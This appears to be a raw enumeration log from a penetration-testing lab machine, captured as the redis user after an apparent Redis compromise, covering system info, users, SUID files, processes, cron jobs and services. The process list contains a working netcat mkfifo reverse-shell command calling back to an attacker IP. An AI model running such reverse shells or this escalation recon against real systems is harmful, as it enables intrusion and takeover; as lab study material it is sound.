System/Kernel
redis@readys:~$ uname -a ; cat /etc/*release
Linux readys 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64 GNU/Linux
PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"4.19.0-18-amd64x86_64Debian GNU/Linux 10 (buster)
Networks
redis@readys:~$ ip route ; arp -a
Cannot open netlink socket: Address family not supported by protocol
? (192.168.154.254) at 00:50:56:9e:0f:31 [ether] on ens192redis@readys:~$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:6379 0.0.0.0:* LISTEN 1277/redis-server 0
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 141 192.168.154.166:41060 192.168.45.218:9999 ESTABLISHED 1487/nc
tcp 0 0 192.168.154.166:6379 192.168.45.218:35254 ESTABLISHED 1277/redis-server 0
udp 0 0 0.0.0.0:60011 0.0.0.0:* - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Users & Groups
redis@readys:~$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin
alice:x:1000:1000::/home/alice:/bin/bash
ls: cannot open directory '/home': Permission deniedalice:x:1000:1000::/home/alice:/bin/bash
redis@readys:~$ cutcut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=101(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=102(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=103(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=104(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=105(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
uid=106(mysql) gid=112(mysql) groups=112(mysql)
uid=107(redis) gid=114(redis) groups=114(redis)
uid=1000(alice) gid=1000(alice) groups=1000(alice)uid=107(redis) gid=114(redis) groups=114(redis)uid=1000(alice) gid=1000(alice) groups=1000(alice)
SUIDs
redis@readys:~$ find / -perm -04000 -ls -type f 2>/dev/null
273373 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
276719 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
398815 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
266035 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
262183 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
265710 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
280578 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
266037 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
262179 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
262180 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
265563 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
272496 156 -rwsr-xr-x 1 root root 157192 Jan 20 2021 /usr/bin/sudo
262182 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswdSGIDs
redis@readys:~$ find / -perm -02000 -ls -type f 2>/dev/null
395189 4 drwxrwsr-x 3 root staff 4096 Oct 20 2020 /usr/local/lib/python3.7
395191 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python3.7/dist-packages
398844 4 drwxrwsr-x 4 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7
399799 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7/site-packages
398845 4 drwxrwsr-x 2 root staff 4096 Oct 20 2020 /usr/local/lib/python2.7/dist-packages
262984 40 -rwxr-sr-x 1 root shadow 39616 Feb 14 2019 /usr/sbin/unix_chkpwd
273564 20 -rwxr-sr-x 1 root mail 18944 Dec 3 2017 /usr/bin/dotlockfile
262181 32 -rwxr-sr-x 1 root shadow 31000 Jul 27 2018 /usr/bin/expiry
276712 316 -rwxr-sr-x 1 root ssh 321672 Jan 31 2020 /usr/bin/ssh-agent
268064 16 -rwxr-sr-x 1 root tty 14736 May 4 2018 /usr/bin/bsd-write
262178 72 -rwxr-sr-x 1 root shadow 71816 Jul 27 2018 /usr/bin/chage
268184 44 -rwxr-sr-x 1 root crontab 43568 Oct 11 2019 /usr/bin/crontab
263608 36 -rwxr-sr-x 1 root tty 34896 Jan 10 2019 /usr/bin/wall
36437 0 drwxr-sr-x 2 redis redis 60 Mar 31 05:09 /run/redis
11102 0 drwxr-sr-x 3 root systemd-journal 60 Mar 31 04:12 /run/log/journal
11103 0 drwxr-s--- 2 root systemd-journal 60 Mar 31 04:12 /run/log/journal/dfeea3a38b804ead8bd9a54e8c7e2bad
655538 4 drwxrwsr-x 2 root staff 4096 Sep 19 2020 /var/local
655584 4 drwxrwsr-x 2 root mail 4096 Oct 20 2020 /var/mail
663808 4 drwxr-s--- 2 mysql adm 4096 Aug 3 2024 /var/log/mysql
664211 4 drwxr-s--- 2 redis adm 4096 Aug 3 2024 /var/log/redis 664211 4 drwxr-s--- 2 redis adm 4096 Aug 3 2024 /var/log/redis
Capabilities
redis@readys:~$ getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+epProcesses
redis@readys:~$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.4 103804 9876 ? Ss 04:12 0:00 /sbin/init
root 256 0.0 0.4 24012 8224 ? Ss 04:12 0:00 /lib/systemd/systemd-journald
root 273 0.0 0.2 22204 5168 ? Ss 04:12 0:00 /lib/systemd/systemd-udevd
systemd+ 393 0.0 0.3 93084 6456 ? Ssl 04:12 0:00 /lib/systemd/systemd-timesyncd
root 394 0.0 0.5 48228 10804 ? Ss 04:12 0:00 /usr/bin/VGAuthService
root 396 0.0 0.5 122868 12168 ? Ssl 04:12 0:02 /usr/bin/vmtoolsd
root 407 0.0 0.3 19308 6432 ? Ss 04:12 0:00 /lib/systemd/systemd-logind
root 409 0.0 0.1 8504 2804 ? Ss 04:12 0:00 /usr/sbin/cron -f
message+ 410 0.0 0.2 9140 4444 ? Ss 04:12 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
root 411 0.0 0.2 225824 4272 ? Ssl 04:12 0:00 /usr/sbin/rsyslogd -n -iNONE
root 461 0.0 0.0 5612 1672 ? Ss+ 04:12 0:00 /sbin/agetty -o -p -- \u --noclear tty1 linux
root 467 0.0 0.3 15852 7172 ? Ss 04:12 0:00 /usr/sbin/sshd -D
mysql 525 0.0 4.5 1257600 93304 ? Ssl 04:12 0:01 /usr/sbin/mysqld
root 526 0.0 0.9 197392 20312 ? Ss 04:12 0:00 /usr/sbin/apache2 -k start
alice 914 0.0 1.7 200692 35896 ? S 04:25 0:00 /usr/sbin/apache2 -k start
alice 956 0.0 0.7 197748 15344 ? S 04:33 0:00 /usr/sbin/apache2 -k start
alice 1015 0.0 0.7 197768 15228 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1020 0.0 0.7 197748 15456 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1023 0.0 1.2 200296 24980 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1027 0.0 1.1 198248 22700 ? S 04:34 0:00 /usr/sbin/apache2 -k start
alice 1046 0.0 0.7 197768 15228 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1050 0.0 0.8 197748 18160 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1052 0.0 0.7 197768 15640 ? S 04:35 0:00 /usr/sbin/apache2 -k start
alice 1060 0.0 1.1 198248 22892 ? S 04:35 0:00 /usr/sbin/apache2 -k start
redis 1277 0.0 0.4 51684 9736 ? Ssl 05:09 0:01 /usr/bin/redis-server 0.0.0.0:6379
redis 1482 0.0 0.0 2388 756 ? S 05:39 0:00 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 9999 >/tmp/f
redis 1485 0.0 0.0 5400 744 ? S 05:39 0:00 cat /tmp/f
redis 1486 0.0 0.1 6992 3736 ? S 05:39 0:00 bash -i
redis 1487 0.0 0.0 2372 1784 ? S 05:39 0:00 nc 192.168.45.218 9999
redis 1551 0.0 0.1 10916 3128 ? R 05:42 0:00 ps -auxwwwroot 409 0.0 0.1 8504 2804 ? Ss 04:12 0:00 /usr/sbin/cron -fmysql 525 0.0 4.5 1257600 93304 ? Ssl 04:12 0:01 /usr/sbin/mysqldalice 914 0.0 1.7 200692 35896 ? S 04:25 0:00 /usr/sbin/apache2 -k start
Cron & Systemd
redis@readys:~$ crontab -l ; cat /etc/crontab ; systemctl list-timers
crontabs/redis/: fopen: Permission denied
*/3 * * * * root /usr/local/bin/backup.sh
NEXT LEFT LAST PASSED UNIT ACTIVATES
Mon 2025-03-31 06:05:03 EDT 21min left Mon 2025-03-31 04:12:19 EDT 1h 31min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Mon 2025-03-31 06:09:00 EDT 25min left Mon 2025-03-31 05:39:00 EDT 4min 49s ago phpsessionclean.timer phpsessionclean.service
Mon 2025-03-31 08:02:20 EDT 2h 18min left Mon 2025-03-31 04:12:19 EDT 1h 31min ago apt-daily.timer apt-daily.service
Tue 2025-04-01 00:00:00 EDT 18h left Mon 2025-03-31 04:12:19 EDT 1h 31min ago logrotate.timer logrotate.service
Tue 2025-04-01 00:00:00 EDT 18h left Mon 2025-03-31 04:12:19 EDT 1h 31min ago man-db.timer man-db.service
Tue 2025-04-01 04:28:10 EDT 22h left Mon 2025-03-31 04:28:10 EDT 1h 15min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
6 timers listed.
Pass --all to see loaded but inactive timers, too.
*/3 * * * * root /usr/local/bin/backup.sh
Services
redis@readys:~$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
init.scope loaded active running System and Service Manager
apache2.service loaded active running The Apache HTTP Server
cron.service loaded active running Regular background program processing daemon
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
mariadb.service loaded active running MariaDB 10.3.31 database server
open-vm-tools.service loaded active running Service for virtual machines hosted on VMware
redis-server.service loaded active running Advanced key-value store
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
vgauth.service loaded active running Authentication service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
23 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.apache2.servicemariadb.serviceredis-server.service
Sudo Version
redis@readys:~$ sudo --version
sudo: effective uid is not 0, is /usr/bin/sudo on a file system with the 'nosuid' option set or an NFS file system without root privileges??
Glibc Version
redis@readys:~$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Debian GLIBC 2.28-10) 2.28